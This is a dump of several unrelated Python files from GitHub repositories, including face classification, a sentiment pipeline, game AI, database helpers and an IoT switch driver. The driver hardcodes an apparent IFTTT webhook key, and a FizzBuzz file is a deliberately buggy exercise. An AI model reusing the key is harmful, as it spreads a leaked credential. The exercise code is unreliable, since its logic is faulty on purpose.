self.combined_siamese_net(base).unsqueeze(0)\n # cmp_enc = self.combined_siamese_net(comparisons)\n\n # l2_dist = torch.cdist(base_enc, cmp_enc).squeeze(1)\n # return l2_dist\n\n def clear_unassigned_images(self):\n # Only used if I want to reassign all the faces. \n unassigned_crit = Q(declared_name__person_name=settings.BLANK_FACE_NAME)\n proposed = ~Q(poss_ident1=None)\n # proposed = ~Q(weight_1=0)\n num_to_reset = Face.objects.filter(unassigned_crit & proposed).count()\n print(f\"Clearing {num_to_reset} unassigned images...\")\n # Filter and update\n Face.objects.filter(unassigned_crit & proposed).update(poss_ident1=None, \n poss_ident2=None, poss_ident3=None, poss_ident4=None, poss_ident5=None,\n weight_1 = 0, weight_2 = 0, weight_3 = 0, weight_4 = 0, weight_5 = 0, )\n\n Person.objects.all().update(num_possibilities = 0)\n\n return \n\n def get_filtered_list_of_faces(self, min_num_faces):\n\n criterion_ign = ~Q(person_name__in=settings.IGNORED_NAMES)\n criterion_unlikely = Q(further_images_unlikely=False)\n\n assigned_people = Person.objects.annotate(c=Count('face_declared', filter=criterion_ign & criterion_unlikely)).filter(c__gt=min_num_faces)\n\n self.person_ids = [p.id for p in assigned_people]\n\n def known_persons_to_dates(self):\n # Get the dates for all pictures with a given person tagged in\n # them. Also calculate the first (non-bogus) timestamp of the person\n # appearing. 
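# a modified z-score over the sorted timestamps, thresholded via the IQR below, screens out stray early outliers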
\n self.person_to_dates = {}\n for known_id in self.person_ids:\n faces_person = Q(declared_name__id=known_id)\n p = Person.objects.get(id=known_id)\n faces = Face.objects.filter(faces_person).order_by('id')\n face_ids = list(faces.values_list('id', flat=True))\n # face_timestamps = [f.source_image_file.dateTakenUTC for f in faces]\n face_timestamps = list(faces.values_list('dateTakenUTC', flat=True))\n timestamps_sorted = np.sort(face_timestamps).reshape(-1, 1)\n earliest_date_idx = np.where(timestamps_sorted > self.bogus_date_utc)\n timestamps_sorted_nonbogus = timestamps_sorted[earliest_date_idx]\n # Modified Z score\n\n median = np.median(timestamps_sorted_nonbogus, axis=0)\n diff = (timestamps_sorted_nonbogus - median)**2\n diff = np.sqrt(diff)\n med_abs_deviation = np.median(diff)\n\n modified_z_score = 0.6745 * diff / med_abs_deviation\n\n min_idx = np.argmin(modified_z_score)\n modified_z_score = modified_z_score[:min_idx]\n\n # Compute z score as a heuristic to get earliest date\n # z_score = stats.zscore(timestamps_sorted_nonbogus).reshape(-1, 1)\n # Then inter-quartile range\n q1 = np.percentile(modified_z_score, 25)#! /\n q3 = np.percentile(modified_z_score, 75)\n iqr = q3 - q1\n lower_z = q1 - iqr \n upper_z = q3 + iqr \n\n # Get the threshold \n # The modified z score is a parabola, so only get the\n # first half\n thresh_idx = np.where(modified_z_score[:min_idx] > upper_z)[0]\n if len(thresh_idx) > 0:\n thresh_idx = np.max(thresh_idx) + 1\n else:\n thresh_idx = 0\n # Throw in a couple more indices for fun\n idx_add = int(np.ceil(len(face_ids) // 1000))\n # print(known_id)\n # print(upper_z)\n # print(modified_z_score[:10])\n thresh_idx += idx_add\n\n # best_early = np.min(timestamps_sorted_nonbogus[np.where(z_score > -1)])\n earliest_date = timestamps_sorted_nonbogus[thresh_idx]\n\n person_data = {}\n person_data['timestamps'] = face_timestamps\n person_data['face_ids'] = face_ids\n # Unlikely to get images before the first timestamp - or we can\n # declare no images more than x days before the earliest timestamp. 
\n person_data['first_timestamp'] = earliest_date\n\n date_string = time.strftime('%Y-%m-%d', time.localtime(earliest_date))\n # print(p, '|', date_string, earliest_date)\n\n\n self.person_to_dates[known_id] = person_data\n\n def doubleCheckFacesTimes(self):\n # This one shouldn't do anything, but it's a backup \n # for now.\n faces = Face.objects.filter(dateTakenUTC=0)\n\n count = faces.count()\n # print(f\"Faces found: {count}\")\n\n for idx, face in enumerate(faces.iterator()):\n if idx % 100 == 0:\n print(f'{idx / count * 100:.2f}%')\n date_utc = face.source_image_file.dateTakenUTC\n face.dateTakenUTC = date_utc\n super(Face, face).save()\n\n def classify_unassigned(self, u_img):\n\n date = u_img.source_image_file.dateTaken.timestamp()\n # print(date)\n date_string = time.strftime('%Y-%m-%d', time.localtime(date))\n if self.DEBUG:\n print(u_img.face_thumbnail)\n print(u_img.source_image_file.dateTaken, date)\n\n short_encoding = torch.Tensor(u_img.face_encoding)\n long_encoding = torch.Tensor(u_img.face_encoding_512)\n base_combined = torch.Tensor(np.concatenate((long_encoding, short_encoding)))\n base_enc = self.siam_triplet.feature_fwd(base_combined).unsqueeze(0)\n\n if short_encoding is None or long_encoding is None:\n print(\"Short and/or long encoding not set\")\n return\n\n if u_img.declared_name.person_name != settings.BLANK_FACE_NAME:\n print(\"Already assigned\")\n return\n\n distances_matrix = None\n # dist_per_category = []\n\n N_COMPARISONS=25\n\n comparison_mat = np.ones((len(self.person_ids), N_COMPARISONS)) * 999\n\n s = time.time()\n if u_img.rejected_fields is not None:\n rejected_ids = u_img.rejected_fields\n else:\n rejected_ids = []\n for row_num, known_id in enumerate(self.person_ids):\n \n person = Person.objects.get(id=known_id)\n first_date_person = self.person_to_dates[known_id]['first_timestamp']\n if date < first_date_person and date > self.bogus_date_utc: \n # This person is unlikely to be in this photo\n # dist_per_category.append(9999)\n # print(f'Person {person} is unlikely to be in this image on {date_string}')\n # continue\n pass\n\n elif known_id in rejected_ids:\n pass\n else:\n # Get a number of comparison images from this person, weighted closely\n # temporally. \n faces_person = Q(declared_name__id=known_id)\n has_short = ~Q(face_encoding=None)\n has_long = ~Q(face_encoding_512=None)\n # Annotate - absolute temporal distance of other faces\n # from this face's date (using annotate). \n # Filter by faces with this known ID. 
\n closest_faces = Face.objects.annotate(result=Abs(F('dateTakenUTC') - date)) \\\n .filter(faces_person & has_short & has_long).order_by('result')\n # Get the N_COMPARISONS closest faces\n closest_faces = closest_faces[:N_COMPARISONS]\n\n short_encs = np.array(closest_faces.values_list('face_encoding', flat=True))\n long_encs = np.array(closest_faces.values_list('face_encoding_512', flat=True))\n cmp_combined = torch.Tensor(np.concatenate((long_encs, short_encs), 1))\n\n # Compute distance with siamese net\n cmp_enc = self.siam_triplet.feature_fwd(cmp_combined)\n l2_dist = torch.cdist(base_enc, cmp_enc).squeeze(1).detach().numpy().reshape(-1)\n l2_dist.sort()\n\n # print(l2_dist)\n comparison_mat[row_num, :len(l2_dist)] = l2_dist\n # print('here')\n if len(l2_dist) < N_COMPARISONS:\n comparison_mat[row_num, len(l2_dist):] = l2_dist[-1]\n # print('here')\n\n # dist_per_category.append(float(torch.min(l2_dist).detach()))\n\n # print(comparison_mat)\n top_votes = np.argmin(comparison_mat, 0)\n vote_counts = np.bincount(top_votes)\n # print(top_votes)\n # print(vote_counts)\n most_votes_ranked = np.argsort(vote_counts)[::-1]\n average_dists = np.mean(comparison_mat, 1)\n\n best_id = self.person_ids[most_votes_ranked[0]]\n first_wt = average_dists[most_votes_ranked[0]]\n person = Person.objects.get(id=best_id)\n if self.DEBUG:\n print(time.time() - s, person, first_wt, len(average_dists), len(self.person_ids), average_dists)\n\n # Set a threshold for a not-person\n thresh = 55\n if first_wt > thresh and self.ignore_person.id not in rejected_ids:\n # Set as an unknown person\n person_id = self.ignore_person\n weight_val = first_wt\n else:\n person_id = person\n weight_val = np.max((0, thresh - first_wt))\n\n u_img.set_possibles_zero()\n u_img.set_possible_person( person_id.id, 1, weight_val)\n\n\nclass siameseModel(nn.Module):\n def __init__(self, n_layers, activation, layers_sizes, dropouts, in_size, loss_type):\n\n super(siameseModel, self).__init__()\n\n layers = []\n for ii in range(n_layers):\n out_size = layers_sizes[ii]\n layers.append(nn.Linear(in_size, out_size))\n layers.append(getattr(nn, activation)())\n if ii < n_layers - 1:\n drop_pct = dropouts[ii]\n layers.append(nn.Dropout(drop_pct))\n\n in_size = out_size\n\n layers.append(getattr(nn, activation)())\n self.feature_fwd = nn.Sequential(*layers)\n\n self.loss_type = loss_type\n if self.loss_type == 'cross_entropy':\n self.joint_layer = nn.Linear(in_size, 1)\n\n def forward(self, *arg):\n if self.loss_type == 'cross_entropy':\n assert len(arg) == 2\n\n base = arg[0]\n second = arg[1]\n\n enc_1 = self.feature_fwd(base)\n enc_2 = self.feature_fwd(second)\n distance = torch.abs(enc_1 - enc_2)\n\n out = self.joint_layer(distance)\n\n return out # No sigmoid\n\n elif self.loss_type == 'triplet':\n assert len(arg) == 3\n base = self.feature_fwd(arg[0])\n pos = self.feature_fwd(arg[1])\n neg = self.feature_fwd(arg[2])\n\n return base, pos, neg","repo_name":"benjaminlewis-1000/django_picasa","sub_path":"face_manager/face_classify.py","file_name":"face_classify.py","file_ext":"py","file_size_in_byte":14785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"25758860861","text":"import os\nimport logging\n\nfrom typing import Optional\nfrom sentivi.data import DataLoader, TextEncoder\nfrom sentivi.classifier.nn_clf import NeuralNetworkClassifier\nfrom sentivi.classifier.transformer import TransformerClassifier\n\ntry:\n import _pickle as pickle\nexcept ModuleNotFoundError:\n import 
pickle\n\n\nclass Pipeline(object):\n \"\"\"\n Pipeline instance\n \"\"\"\n def __init__(self, *args, **kwargs):\n \"\"\"\n Initialize Pipeline instance\n\n :param args: arbitrary arguments\n :param kwargs: arbitrary keyword arguments\n \"\"\"\n super(Pipeline, self).__init__()\n self.apply_layers = list()\n language_model_shortcut = None\n\n for method in args:\n self.apply_layers.append(method)\n\n if isinstance(method, TransformerClassifier):\n language_model_shortcut = method.language_model_shortcut\n\n if language_model_shortcut is not None:\n for method in self.apply_layers:\n if isinstance(method, TextEncoder):\n if method.encode_type != 'transformer':\n logging.warning(f'Expected transformer encoder type for TextEncoder, '\n f'but got {method.encode_type}. It\\'s will be implicit cast into transformer')\n method.encode_type = 'transformer'\n method.language_model_shortcut = language_model_shortcut\n break\n\n self.__vocab = None\n self.__labels_set = None\n self.__n_grams = None\n self.__max_length = None\n self.__embedding_size = None\n\n def append(self, method):\n \"\"\"\n Append a callable layer\n\n :param method: [DataLayer, ClassifierLayer]\n :return: None\n \"\"\"\n self.apply_layers.append(method)\n\n def keyword_arguments(self):\n \"\"\"\n Return pipeline's protected attribute and its value in form of dictionary.\n\n :return: key-value of protected attributes\n :rtype: Dictionary\n \"\"\"\n return {attr[11:]: getattr(self, attr) for attr in dir(self) if\n attr[:10] == '_Pipeline_' and getattr(self, attr) is not None}\n\n def forward(self, *args, **kwargs):\n \"\"\"\n Execute all callable layer in self.apply_layers\n\n :param args:\n :param kwargs:\n :return:\n \"\"\"\n x = None\n for method in self.apply_layers:\n x = method(x, *args, **kwargs, **self.keyword_arguments())\n\n if isinstance(method, DataLoader):\n self.__n_grams, self.__vocab, self.__labels_set, self.__max_length = method.n_grams, method.vocab, \\\n method.labels_set, \\\n method.max_length\n\n return x\n\n def predict(self, x: Optional[list], *args, **kwargs):\n \"\"\"\n Predict target polarity from list of given features\n\n :param x: List of input texts\n :param args: arbitrary positional arguments\n :param kwargs: arbitrary keyword arguments\n :return: List of labels corresponding to given input texts\n :rtype: List\n \"\"\"\n for method in self.apply_layers:\n if isinstance(method, DataLoader):\n text_processor = method.text_processor\n x = [' '.join([_text for _text in text_processor(text).split(' ') if _text != '']) for text in x]\n continue\n x = method.predict(x, *args, **kwargs, **self.keyword_arguments())\n return x\n\n def decode_polarity(self, x: Optional[list]):\n \"\"\"\n Decode numeric polarities into label polarities\n\n :param x: List of numeric polarities (i.e [0, 1, 2, 1, 0])\n :return: List of label polarities (i.e ['neg', 'neu', 'pos', 'neu', 'neg']\n :rtype: List\n \"\"\"\n return [self.__labels_set[idx] for idx in x]\n\n def get_labels_set(self):\n \"\"\"\n Get labels set\n\n :return: List of labels\n :rtype: List\n \"\"\"\n return self.__labels_set\n\n def get_vocab(self):\n \"\"\"\n Get vocabulary\n\n :return: Vocabulary in form of List\n :rtype: List\n \"\"\"\n return self.__vocab\n\n def save(self, save_path: str):\n \"\"\"\n Save model to disk\n\n :param save_path: path to saved model\n :return:\n \"\"\"\n import dill\n with open(save_path, 'wb') as stream:\n dill.dump(self, stream)\n print(f'Saved model to {save_path}')\n\n @staticmethod\n def load(model_path: str):\n \"\"\"\n 
Load model from disk\n\n :param model_path: path to pre-trained model\n :return:\n \"\"\"\n import dill\n assert os.path.exists(model_path), FileNotFoundError(f'Could not found {model_path}')\n with open(model_path, 'rb') as stream:\n print(f'Loaded model from {model_path}')\n return dill.load(stream)\n\n def to(self, device):\n \"\"\"\n To device\n\n :param device:\n :return:\n \"\"\"\n for method in self.apply_layers:\n if isinstance(method, NeuralNetworkClassifier) or isinstance(method, TransformerClassifier):\n method.clf = method.clf.to(device)\n\n def get_server(self):\n \"\"\"\n Serving model\n\n :return:\n \"\"\"\n from sentivi.service import RESTServiceGateway\n\n return RESTServiceGateway(self, port=5000)\n\n __call__ = forward\n","repo_name":"vndee/sentivi","sub_path":"sentivi/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":5606,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"71"} +{"seq_id":"15279269151","text":"import pandas as pd\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom matplotlib import font_manager\n#字体\nmy_font=font_manager.FontProperties(fname=\"\")\n#统计每个种类型的电影的个数有多少action,scary;;;\nfile_path=\"./IMDB-Movie-Data.csv\"\ndf= pd.read_csv(file_path)\nprint(df.info())\nprint(df.head(1))\ndf_genre= df[\"Genre\"]\nprint(df_genre)\n#输出后发现数据之间是通过,隔开的所以通过split切开\ntemp_list = df_genre.str.split(\",\").tolist()#注意切开之后,这个是[[],[]]多个列表嵌套的所以使用set进行统计\n#将所有题材的类型的电影进行放到一个列表里\ngenre_list= list(set([i for j in temp_list for i in j]))\n\n#统计时,使用一个全0的数组进行统计\nzero_df = pd.DataFrame(np.zeros((df.shape[0],len(genre_list))),columns=genre_list)\n# 行索引actor 列索引(电影)\n#zero_df = pd.DataFrame(np.zeros((df.shape[0],len(genre_list))),columns=genre_list\nprint(zero_df)\n#统计\nfor i in range(df.shape[0]):#某行电影数据\n zero_df.loc[i,temp_list[i]]=1#第几行第几列的数据为\n\nprint(zero_df)\n#将每个电影数据的出现的地方均已标记为1\n#按照行进行统计王上打0\ncount = zero_df.sum(axis=0)\nprint(count)\n#将数据进行排序\ncount= count.sort_values()\n_x = count.index\n_y = count.values\n\n#画图:使用条形图,因为数据与数据之间是没有关系的\nplt.figure(figsize=(20,8),dpi=80)\nplt.bar(range(len(_x)),_y)\n\nplt.xticks(range(len(_x)),_x)\nplt.show()","repo_name":"gehong-coder/commit_paper","sub_path":"MachineLearning/数据分析/learnpandas电影统计2.py","file_name":"learnpandas电影统计2.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"28738982743","text":"import saltools.misc as sltm\n\nfrom os.path import join \n\ndef set_param (\n param ,\n value ):\n globals()[param] = value\ndef set_params (\n root = './' ):\n settings_dict = sltm.g_config(join(root, '__settings.json'))\n _params_list = {\n 'EXTRACTORS_SEPARATOR' : '-->' ,\n 'KWARGS_SEPARATOR' : '<->' ,\n 'ESC_OPEN' : '<(' ,\n 'ESC_CLOSE' : ')>' ,\n 'LIST_SEPARATOR' : '!!' 
,\n 'COLLECTIONS_SEPARATOR' : '|=|' ,\n }\n\n for param, def_value in _params_list.items() :\n set_param(param, settings_dict.get('parameters',{}).get(param, def_value))\n \n set_param('RESOURCE_FOLDER', join(root, 'resources'))\n\nset_params()","repo_name":"SudipAdh/salscraper","sub_path":"src/salscraper/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"18682051896","text":"from DominoesGame import Dominoes, Domino\nimport random\n\n\nclass NegaMax:\n def __init__(self, currentGame):\n self.currentGame = currentGame\n\n def negamax(self, initial, depth, alpha, beta, player):\n cg = self.currentGame\n if depth == 0:\n return None, cg.evaluate(player)\n \n if cg.isEnd():\n q = cg.win_score(player)\n if not q:\n return None, cg.evaluate(player)\n return None, q\n\n maxMove, maxScore = None, None\n for move in sorted(cg.possible_actions(player), key=lambda x: -sum(x[0].vals)):\n prob = cg.makeProbabilisticMove(player, move)\n _, currentScore = self.negamax(initial, depth-1, -beta, -alpha, cg.get_next_player(player))\n currentScore = -prob * currentScore\n if maxScore is None or currentScore > maxScore:\n maxMove, maxScore = move, currentScore\n alpha = max(alpha, currentScore)\n cg.undoMove(player, move)\n if alpha >= beta:\n break\n return maxMove, maxScore\n\n\ndef setupGame(r):\n tiles = []\n for i in range(7):\n for j in range(i, 7):\n tiles.append((i, j))\n random.shuffle(tiles)\n myTiles = tiles[:7]\n players_tiles = {}\n players_tuples = [None]*4\n players_tiles[0] = set(map(lambda x: Domino(*x), myTiles))\n players_tuples[0] = myTiles\n for i in range(1, 4):\n this_players_tiles = tiles[7*i:7*(i+1)]\n players_tiles[i] = set(map(lambda x: Domino(*x), this_players_tiles))\n players_tuples[i] = this_players_tiles\n starter = r % 4\n return ((Dominoes(tiles, myTiles, starter), Dominoes(tiles, players_tuples[2], (starter+2) % 4)), players_tiles)\n\n\ndef greedyPlays(game, tiles):\n games = game\n game, ogame = games\n player = game.currentPlayer\n actions = game.possible_actions(None, False)\n my_tiles = tiles[player]\n possible_moves = [Domino(-1, -1)]\n for t in my_tiles:\n if t in actions:\n possible_moves.append(t)\n maximum = -1\n ret = possible_moves[0]\n for domino in possible_moves:\n if domino.vals[1] + domino.vals[0] > maximum:\n maximum = domino.vals[1] + domino.vals[0]\n ret = domino\n if (game.ends[0] in ret and game.ends[1] in ret and game.ends[0] != game.ends[1]):\n placement = random.choice((0, 1))\n game.update(ret, None, placement)\n ogame.update(ret, None, placement)\n else:\n game.update(ret, None)\n ogame.update(ret, None)\n if ret != Domino(-1, -1):\n tiles[player].remove(ret)\n return tiles\n\n\ndef negamaxPlays(game, tiles, player):\n player /= 2\n currentGame = game[int(player)]\n otherGame = game[int(1-player)]\n actions = currentGame.possible_actions(0)\n if len(actions) == 1:\n currentGame.update(actions[0][0])\n otherGame.update(actions[0][0])\n if not actions[0][0] == Domino(-1, -1):\n tiles[2*player].remove(actions[0][0])\n else:\n pnm = NegaMax(currentGame)\n max_move, _ = pnm.negamax(10, 10, 4, .3, 0)\n\n currentGame.update(max_move[0], placement=max_move[1])\n otherGame.update(max_move[0], placement=max_move[1])\n if not max_move[0] == Domino(-1, -1):\n tiles[2*player].remove(max_move[0])\n return tiles\n\n\ndef printScore(game, players_tiles):\n player_pips = [0]*4\n for t in game.myTiles:\n if t not in 
game.dominos_played:\n player_pips[0] += sum(t.vals)\n for i in range(1, 4):\n for t in players_tiles[i]:\n if t not in game.dominos_played:\n player_pips[i] += sum(t.vals)\n if (player_pips[0] == 0 or player_pips[2] == 0 or\n player_pips[0]+player_pips[2] < player_pips[1] + player_pips[3]):\n return 'won'\n if (player_pips[1] == 0 or player_pips[3] == 0 or\n player_pips[0]+player_pips[2] > player_pips[1] + player_pips[3]):\n return 'lost'\n if player_pips[0]+player_pips[2] == player_pips[1] + player_pips[3]:\n return 'tie'\n\n\ndef revealTiles(games, players_tiles):\n for i in range(4):\n for t in players_tiles[i]:\n games[0].probabilities[t] = [0]*4\n games[0].probabilities[t][i] = 1\n games[1].probabilities[t] = [0]*4\n games[1].probabilities[t][(i+2) % 4] = 1\n\n\ndef main():\n results = []\n for r in range(100):\n games, playerTiles = setupGame(r)\n revealTiles(games, playerTiles)\n while not games[0].isEnd():\n player = games[0].currentPlayer\n tiles = greedyPlays(games, playerTiles) if player % 2 == 1 else negamaxPlays(\n games, playerTiles, player)\n games[0].debugging()\n games[1].debugging()\n results.append(printScore(games[0], playerTiles))\n print(\"RESULTS\")\n print(\"Number of wins:\", results.count(\"won\"))\n print(\"Number of losses:\", results.count(\"lost\"))\n print(\"Number of ties:\", results.count(\"tie\"))\n\n\nmain()\n","repo_name":"521310kevin/Dominoes","sub_path":"Implementation.py","file_name":"Implementation.py","file_ext":"py","file_size_in_byte":5028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"2699519214","text":"from sqlalchemy.dialects.postgresql import insert\nfrom sqlalchemy import select, update, delete\n\nfrom workers_hierarchy.users.tables import workers\n\n\n__all__ = [\n 'select_worker_by_id',\n 'select_all_workers',\n 'update_worker_by_id',\n 'insert_worker',\n 'delete_worker_by_id'\n]\n\n\nasync def select_all_workers(conn):\n query = select(\n [\n workers.c.id,\n workers.c.first_name,\n workers.c.last_name,\n workers.c.surname,\n workers.c.position,\n workers.c.manager_id\n ]\n )\n cursor = await conn.execute(query)\n\n return await cursor.fetchall()\n\n\nasync def select_worker_by_id(conn, key):\n manager = workers.alias()\n query = select(\n [\n workers,\n manager.c.first_name.label('manager_first_name'),\n manager.c.last_name.label('manager_last_name'),\n manager.c.surname.label('manager_surname'),\n manager.c.id.label('id_manager')\n ])\\\n .join(manager, workers.c.manager_id == manager.c.id)\\\n .where(workers.c.id == key)\n cursor = await conn.execute(query)\n\n return await cursor.fetchone()\n\n\nasync def update_worker_by_id(conn, key, data):\n query = update(workers)\\\n .where(workers.c.id == key)\\\n .values(data)\n cursor = await conn.execute(query)\n\n return cursor\n\n\nasync def insert_worker(conn, data):\n query = insert(workers)\\\n .values(data)\\\n .on_conflict_do_nothing(constraint='const')\\\n .returning(workers.c.id)\n cursor = await conn.execute(query)\n return await cursor.scalar()\n\n\nasync def delete_worker_by_id(conn, key):\n query = delete(workers)\\\n .where(workers.c.id == key)\n cursor = await conn.execute(query)\n return cursor\n","repo_name":"DTeltsov/workers_hierarchy","sub_path":"workers_hierarchy/users/db_utils.py","file_name":"db_utils.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"30243970392","text":"import random\n\nN = 20 # cells 
in state\nG = 20 # generations to simulate\n\n# a rule is an 8-array of boolean values\n\ndef index_to_rule(i):\n rule = []\n bin_str = bin(i)[2:]\n for j in range(len(bin_str)):\n b = int(bin_str[j])\n rule.append(int(b))\n for j in range(8 - len(bin_str)):\n rule.append(0)\n return rule\n\nrule = index_to_rule(70)\n\ndef local_update(a, b, c):\n return rule[sum([\n 1 if a else 0,\n 2 if b else 0,\n 4 if c else 0])]\n\ndef update(row):\n row_new = [0] * N\n for i in range(N):\n if i == 0:\n row_new[i] = local_update(False, row[i], row[i+1])\n elif i == N-1:\n row_new[i] = local_update(row[i-1], row[i], False)\n else:\n row_new[i] = local_update(row[i-1], row[i], row[i+1])\n return row_new\n\ndef simulate(row):\n history = [row]\n for _ in range(G):\n row = update(row)\n history.append(row)\n return history\n\ndef write_history(history):\n with open(\"rowfinite_output.txt\", \"w+\") as file:\n file.write(str(history)\\\n .replace(\"[\", \"{\")\\\n .replace(\"]\", \"}\"))\n\ndef main():\n # row_start = [random.randint(0,1) for _ in range(N)]\n row_start = [0] * N\n row_start[len(row_start)//2] = 1\n history = simulate(row_start)\n write_history(history)\n\nmain()\n","repo_name":"Riib11/Metascience","sub_path":"paper/automata/rowfinite.py","file_name":"rowfinite.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"72692305190","text":"three_mul = 'fizz'\nfive_mul = 'buzz'\nnum1 = 3\nnum2 = 4 \nmax_num = 100\n \nfor i in range(1,max_num):\n # % or modulo division gives you the remainder \n \n if i%num1 == 0:\n print(i, three_mul)\n elif i%num2 == 0:\n print(i, five_mul)\n elif i % num1 == 0 and i % num2 == 0:\n print(i, three_mul + five_mul)","repo_name":"DanZech/DCI_Python","sub_path":"2023_01_04_introduction-bug_fixing/Task 1 - bug_fixing.py","file_name":"Task 1 - bug_fixing.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"18216590437","text":"from django.contrib import admin\nfrom django.urls import include, path\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('auth/', include('users.urls', namespace='users')),\n # Все адреса с префиксом /auth\n # будут прернаправлены в модуль django.contrib.auth\n path('auth/', include('django.contrib.auth.urls')),\n path('', include('posts.urls', namespace='posts')),\n path('about/', include('about.urls', namespace='about')),\n]\nhandler404 = 'core.views.page_not_found'\nhandler500 = 'core.views.server_error'\nhandler403 = 'core.views.permission_denied'\n\nif settings.DEBUG:\n urlpatterns += static(\n settings.MEDIA_URL, document_root=settings.MEDIA_ROOT\n )\n","repo_name":"Motion-Up/hw05_final","sub_path":"yatube/yatube/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"36416433821","text":"from contractfinder import db, Notice, NoticeDetail, NoticeDocument\n\ndb.create_all()\n\nnotice = Notice(id=1321842,\n ref_no='ABC123',\n length=36)\ndb.session.add(notice)\n\ndetails = NoticeDetail(id=1,\n notice_id=1321842,\n title='Air Quality Testing',\n buying_org='MoD',\n description='This is the description')\ndb.session.add(details)\n\nfile_ids = ['13523544-019b-49e5-9eee-93a6e0a5d551',\n 'ad3a309e-3ecf-404e-a8e0-c108a783bded',\n 
'3a431024-f743-4158-b0f8-1cedafd3c222',]\n #'bea068c5-5637-4ed9-8bb9-f0d48ff4295a',\n #'725401f4-7839-44b6-9365-8a32b0a3362c',\n #'d85a7462-ac38-40ba-9b16-660badf6ee98']\nfor i, file_id in enumerate(file_ids):\n db.session.add(NoticeDocument(id=i, \n notice_id=1321842,\n mimetype='application/pdf',\n file_id=file_id,\n filename='file{0}.pdf'.format(i),\n title='Document {0}'.format(i)))\n\ndb.session.commit()\n\nthe_notice = Notice.query.filter_by(id=1321842).first()\nprint(the_notice.details.title)\n","repo_name":"datagovuk/contracts-archive","sub_path":"populate.py","file_name":"populate.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"29739208133","text":"#!/usr/bin/env python3\nimport sys\nimport socket\nfrom threading import Thread, Lock\nfrom struct import pack, unpack\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nimport requests\n\nNO_TYPE = 0\nGPIO_26_OFF = 1\nGPIO_26_ON = 2\nGPIO_27_OFF = 3\nGPIO_27_ON = 4\n\nHEADER_LENGTH = 4\n\nTESTING = False\n\nGPIO_26_STATUS = \"off\"\nGPIO_27_STATUS = \"off\"\n\nGPIO_26_ON_PAGE = \"
\"\nGPIO_26_OFF_PAGE = \"

\"\nGPIO_27_ON_PAGE = \"

\"\nGPIO_27_OFF_PAGE = \"

\"\nHTML_PAGE = \"\"\"\n\n\n\n

ESP32 Web Server

\n

GPIO 26 - State %s

\n%s\n

GPIO 27 - State %s

\n%s\n\"\"\"\n\nIFTTT_URL = \"https://maker.ifttt.com/trigger/append_to_sheet/with/key/cUaZNrS7U0wAsZOzakzVUe\"\nsyn_bd_host = \"\"\nsyn_bd_uri = \"command/\"\nhttps_port = 443\n\nlocal_controller_address = \"192.168.5.250\"\nlocal_controller_port = 54321\n\ndevice_connection = None\nhttp_port = 8099\n\n\nclass Message:\n def __init__(self, message):\n self.type = None\n self.type = unpack('I', message)[0]\n self.type = socket.ntohl(self.type)\n\n def construct_message(self):\n message = pack('I', socket.htonl(self.type))\n return message\n\n\nclass WebServer_Driver:\n def __init__(self, device_port_number, vlan_id):\n self.device_connected = False\n self.device_connection = None\n self.device_socket = None\n self.device_socket = socket.socket(\n socket.AF_INET, socket.SOCK_STREAM)\n self.device_socket.setsockopt(\n socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.device_socket.bind((f'192.168.{vlan_id}.1', device_port_number))\n self.device_socket.listen(1)\n self.device_socket_listener_thread = Thread(\n target=self.accept_device_connection, args=())\n self.device_socket_listener_thread.start()\n self.device_socket_listener_thread.join()\n\n def accept_device_connection(self):\n # while True:\n (conn, address) = self.device_socket.accept()\n self.device_connection = conn\n self.get_command()\n\n def get_command(self):\n while True:\n r = requests.get(f\"https://{syn_bd_host}/{syn_bd_uri}\")\n if r.status_code != 200 or \\\n r.text == '0':\n continue\n # Turn on switch\n message = Message(bytes(HEADER_LENGTH))\n message.type = GPIO_26_ON\n msg = message.construct_message()\n self.device_connection.sendall(msg)\n # Send notification feedback to controller\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((local_controller_address, local_controller_port))\n s.send(b\"7\")\n\n\ndef main():\n if len(sys.argv) <= 2:\n print(\"Error number of arguments\")\n print(\"Usage: ${1} \")\n return -1\n\n webserver_driver = WebServer_Driver(int(sys.argv[1]), int(sys.argv[2]))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"synergylabs/iot-capture","sub_path":"macro-benchmark-esp32/pio-switch-webhook-custom-driver/src/WiFi_Web_Server_Outputs_driver.py","file_name":"WiFi_Web_Server_Outputs_driver.py","file_ext":"py","file_size_in_byte":3667,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"71"} +{"seq_id":"5894814006","text":"import os\nfrom HiveNetCore.utils.import_tool import DynamicLibManager\nfrom HiveNetPipeline import PipelineProcesser\nfrom HiveNetBuildTool.build import BuildPipeline\n\n\nclass ProcesserBuildGetSysInfos(PipelineProcesser):\n \"\"\"\n 获取系统信息\n \"\"\"\n\n @classmethod\n def processer_name(cls) -> str:\n \"\"\"\n 处理器名称,唯一标识处理器\n\n @returns {str} - 当前处理器名称\n \"\"\"\n return 